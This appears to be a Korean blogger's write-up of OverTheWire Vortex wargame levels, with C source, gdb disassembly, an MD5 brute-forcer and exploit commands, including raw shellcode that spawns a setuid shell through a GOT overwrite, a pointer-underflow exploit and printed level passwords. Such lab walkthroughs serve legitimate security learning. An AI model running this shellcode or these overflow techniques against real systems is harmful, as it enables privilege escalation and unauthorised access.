MD5 Brute Force

A password is required for the next level. vortex5.c and md5.h. a-z,A-Z,0-9 is the search space. The password length is 5 chars long, it was originally 7 chars long.

Collision(s) tested : 489265082 in 217 second(s), 361 millisec, 101 microsec.
Average of 2250932.1 hashes/sec.

소스가 너무길어서 파일로 첨부하겟음 .. 

vortex5.c

MD5를 브루트 포싱하는 문제다 

main 을 아래와 같이 수정해 주고 

int main(int argc, char **argv)

{

unsigned char buf[16];

MD5Context a;

char str[100] = { 0, };

int i;

int stri = 0;

int startstr[5] = { 0, 0, 0, 0, 0 };

char tx[6] = { 0, };

char *x = tx;

for (i = 0x30; i <= 0x39; i++)

str[stri++] = (char)i;

for (i = 0x41; i <= 0x5A; i++)

str[stri++] = (char)i;

for (i = 0x61; i <= 0x7a; i++)

str[stri++] = (char)i;

while (1){

int j;

for (j = 0; j<5; j++){

x[j] = str[startstr[j]];

}

startstr[4]++;

if (startstr[4] == stri){

startstr[3]++;

startstr[4] = 0;

}

if (startstr[3] == stri){

startstr[2]++;

startstr[3] = 0;

}

if (startstr[2] == stri){

startstr[1]++;

startstr[2] = 0;

printf("%s\n", x);

}

if (startstr[1] == stri){

startstr[0]++;

startstr[1] = 0;

}

if (startstr[0] == stri){

printf("Not Found PassWord");

break;

}

MD5Init(&a);

MD5Update(&a, x, strlen(x));

MD5Final(buf, &a);

if (memcmp(buf, "\x15\x5f\xb9\x5d\x04\x28\x7b\x75\x7c\x99\x6d\x77\xb5\xea\x51\xf7", 16) == 0){

printf("You got the right password, congrats!\n");

printf("password : %s\n", x);

break;

}

}

exit(0);

}

/tmp 에서 실행시켜주고 기다리다보면 아래처럼 키값이 나온다 

You got the right password, congrats!

password : rlTf6

이거를 가지고 password에 넣어주면 

vortex5@melinda:/tmp$ /vortex/vortex5

Password: 

6:36

You got the right password, congrats!

$ cat /etc/vortex_pass/vortex6

*uy5qDRb2

성공 

+)다시 풀어봐야될듯 

우선 FSB를 얼피설피 알고있어서 문서를 보고 공부를 좀햇는데 

http://geundi.tistory.com/124 와

http://proneer.tistory.com/entry/FormatString-%ED%8F%AC%EB%A7%B7%EC%8A%A4%ED%8A%B8%EB%A7%81Format-String-Attack

내 블로그에 도움될만한문서에 올려둔 

formatstring bug.pdf

가 많은 도움이 되었다 

+)드디어 풀렸다 .. WoW 

To exec or not to exec

This is the common format string bug, exploit it with care though as a check is made with argc. What is the layout of a process’s memory? How are programs executed?

// -- andrewg, original author was zen-parse :)

#include <stdlib.h>

int main(int argc, char **argv)

{

        if(argc) exit(0);

        printf(argv[3]);

        exit(EXIT_FAILURE);

}

위의 소스를 보면 알수있듯이 argc가 존재하면 exit 해버린다 따라서 우회하기 위해서 소스를 짜고 실행햇다

+)감동 ㅠ ㅁ ㅠ 

A Stack Overflow with a Difference

This level is pretty straight forward. Just sit down and understand what the code is doing. Your shellcode will require a setuid(LEVEL4_UID) since bash drops effective privileges. You could alternatively write a quick setuid(geteuid()) wrapper around bash.

NOTE: ctors/dtors might no longer be writable, although this level is compiled with -Wl,-z,norelro. Lookup some information about this e.g. here

NOTE에서 볼수있듯이 더이상 ctors/ dtors 부분을 사용할수 있는 상태가 아니다 .. 저거도 안읽어보고 문제를 푸니까 당연히 안풀리지 .. 

[소스]

/*

 * 0xbadc0ded.org Challenge #02 (2003-07-08)

 *

 * Joel Eriksson <je@0xbadc0ded.org>

 */

#include <string.h>

#include <stdlib.h>

#include <stdio.h>

unsigned long val = 31337;

unsigned long *lp = &val;

int main(int argc, char **argv)

{

        unsigned long **lpp = &lp, *tmp;

        char buf[128];

        if (argc != 2)

                exit(1);

        strcpy(buf, argv[1]);

        if (((unsigned long) lpp & 0xffff0000) != 0x08040000)

                exit(2);

        tmp = *lpp;

        **lpp = (unsigned long) &buf;

        // *lpp = tmp; // Fix suggested by Michael Weissbacher @mweissbacher 2013-06-30

        exit(0);

}

처음에 포인터가 너무많아서 좀 당황했다 그리고 exit(0) 부분 때문에 보통의 bof는 먹히지 않는 상태이다

[summary]

lpp -> lp-> val [&buf]

lpp -> lp -> dtors[&buf] 

lpp -> lp  -> $exit@got 

[gdb]

(gdb) set disassembly-flavor att

(gdb) disas main

Dump of assembler code for function main:

   0x080483f4 <+0>: push   %ebp

   0x080483f5 <+1>: mov    %esp,%ebp

   0x080483f7 <+3>: and    $0xfffffff0,%esp     ; 0xffffffff-0xfffffff0 +1 = 16

   0x080483fa <+6>: sub    $0xa0,%esp   ;0xa0=160  ,esp 에 160바이트 할당  ,dummy 가 껴있는 것 같다 

   0x08048400 <+12>: movl   $0x804974c,0x9c(%esp)    

  0x0804840b <+23>: cmpl   $0x2,0x8(%ebp)         ; argc =2 인지 비교함 

   0x0804840f <+27>: je     0x804841d <main+41>        ;argc=2라면 main +41로 jmp

   0x08048411 <+29>: movl   $0x1,(%esp)       ;아닐경우

   0x08048418 <+36>: call   0x8048320 <exit@plt>     ; exit@plt 호출

   0x0804841d <+41>: mov    0xc(%ebp),%eax     ; argv[0]을 eax에 넣는다

   0x08048420 <+44>: add    $0x4,%eax     ;argv[0] +4

   0x08048423 <+47>: mov    (%eax),%eax

   0x08048425 <+49>: mov    %eax,0x4(%esp)    ;argv[1]의 주소를 스택에 넣어줌

   0x08048429 <+53>: lea    0x18(%esp),%eax

   0x0804842d <+57>: mov    %eax,(%esp)

   0x08048430 <+60>: call   0x8048300 <strcpy@plt>

   0x08048435 <+65>: mov    0x9c(%esp),%eax

   0x0804843c <+72>: mov    $0x0,%ax

   0x08048440 <+76>: cmp    $0x8040000,%eax

   0x08048445 <+81>: je     0x8048453 <main+95>

   0x08048447 <+83>: movl   $0x2,(%esp)

   0x0804844e <+90>: call   0x8048320 <exit@plt>

   0x08048453 <+95>: mov    0x9c(%esp),%eax

   0x0804845a <+102>: mov    (%eax),%eax

   0x0804845c <+104>: mov    %eax,0x98(%esp)

   0x08048463 <+111>: mov    0x9c(%esp),%eax

   0x0804846a <+118>: mov    (%eax),%eax

   0x0804846c <+120>: lea    0x18(%esp),%edx

   0x08048470 <+124>: mov    %edx,(%eax)

   0x08048472 <+126>: movl   $0x0,(%esp)

   0x08048479 <+133>: call   0x8048320 <exit@plt>    ; exit 호출 

[structure]

buf[128]    |    dummy [8]   |    tmp [4]   |    lpp [4]   |    dummy [8]  |    SFP[4]    |    RET[4]

vortex3@melinda:/vortex$ objdump -h vortex3 |grep dtors

 18 .dtors        00000008  0804964c  0804964c  0000064c  2**2

vortex3@melinda:/vortex$ objdump -s -j .data ./vortex3

./vortex3:     file format elf32-i386

Contents of section .data:

 8049740 00000000 00000000 697a0000 48970408  ........iz..H...

val 값 31337(hex : 7a69)가 들어가있는거로 보아서 분명 제대로 찾아왓다 .. 

gdb 로 분석해보았다 

(gdb) x/x 0x8049730

0x8049730 <strcpy@got.plt>: 0x08048306

(gdb) 

0x8049734 <__gmon_start__@got.plt>: 0x08048316

(gdb) 

0x8049738 <exit@got.plt>: 0x08048326

(gdb) 

0x804973c <__libc_start_main@got.plt>: 0x08048336

(gdb) 

0x8049740 <data_start>: 0x00000000

(gdb) 

0x8049744 <__dso_handle>: 0x00000000

(gdb) 

원래 이사이에 p.0이 존재해줘야되는데 보이지가 않는다 ;; 

0x8049748 <val>: 0x00007a69

(gdb) 

0x804974c <lp>: 0x08049748

(gdb) 

0x8049750 <completed.6159>: 0x00000000

(gdb) 

0x8049754 <dtor_idx.6161>: 0x00000000

(gdb) 

------------------------------------------------------------------------------------

[attack] ->GOT overwrite

shell code(34)     |    NOP[106]    |  $exit@got (exit@plt +2=  exit@got 이다 왜냐하면  jmp instruction이 2바이트 이기 때문이다) 

vortex3@melinda:/vortex$ ./vortex3 `perl -e 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80","\x90"x106,"\x22\x83\x04\x08"'`

$ cat /etc/vortex_pass/vortex4

2YmgK1=jw

`

`

c.f) 

~> p.0가 dtors를 가리키고 있다

+).dtors 영역 

http://www.exploit-db.com/papers/13234/

http://bbolmin.tistory.com/34 

참조 

Level Goal

Create a special tar file

[source]

#include <stdlib.h>

#include <stdio.h>

#include <sys/types.h>

int main(int argc, char **argv)

{

        char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] };

        execv(args[0], args);

}

tar 명령을 이해하고 있다면 쉽게 풀 수 있는 문제였다 

vortex2@melinda:/etc/vortex_pass$ /vortex/vortex2 ./vortex3 |cat /tmp/ownership.\$\$.tar

vortex30000400001161300116130000000001212164101775012202 0ustar  vortex3vortex364ncXTvx#

성공 

Canary Values

We are looking for a specific value in ptr. You may need to consider how bash handles EOF..

[source]

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <stdio.h>

#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)

{

        int i;

        printf("[ ");

        for(i=0; i < len; i++) printf("%x ", buf[i]); 

        printf(" ]\n");

}

int main()

{

        unsigned char buf[512];

        unsigned char *ptr = buf + (sizeof(buf)/2);

        unsigned int x;

        while((x = getchar()) != EOF) {

                switch(x) {

                        case '\n': print(buf, sizeof(buf)); continue; break;

                        case '\\': ptr--; break; 

                        default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;

                }

        }

        printf("All done\n");

}

볼텍스 푸는데 서버가 참 .. 말로 표현할수 없을만큼 빠르다

포인터가 buf[256]을 가르키고있다.

switch의 case '\\' 를 사용하게 되면 ptr-- 되므로 

ptr 이 0xca000000을 가리키게 하기위해 \\을 261번 넣어주었다 

vortex1@melinda:/vortex$ (perl -e 'print "\\"x261,"\xca\x00"';cat)|./vortex1

id

uid=5002(vortex2) gid=5001(vortex1) groups=5002(vortex2),5001(vortex1)

cat /etc/vortex_pass/vortex2

23anbT\rE

Level Goal

Your goal is to connect to port 5842 on vortex.labs.overthewire.org and read in 4 unsigned integers in host byte order. Add these integers together and send back the results to get a username and password for vortex1. This information can be used to log in using SSH.

Note: vortex is on an 32bit x86 machine (meaning, a little endian architecture)

vortex.labs.overthewire.org 에 port 5842로 접속해서 unsigned int로 4바이트 받아오는 문제다 

[source]

처음 짜보는 소스라서 거의 배끼다 싶이 햇는데 여튼 소스는 위와 같다 

[result]

+) 다음레벨부터는 lambda 를 사용해봐야겟다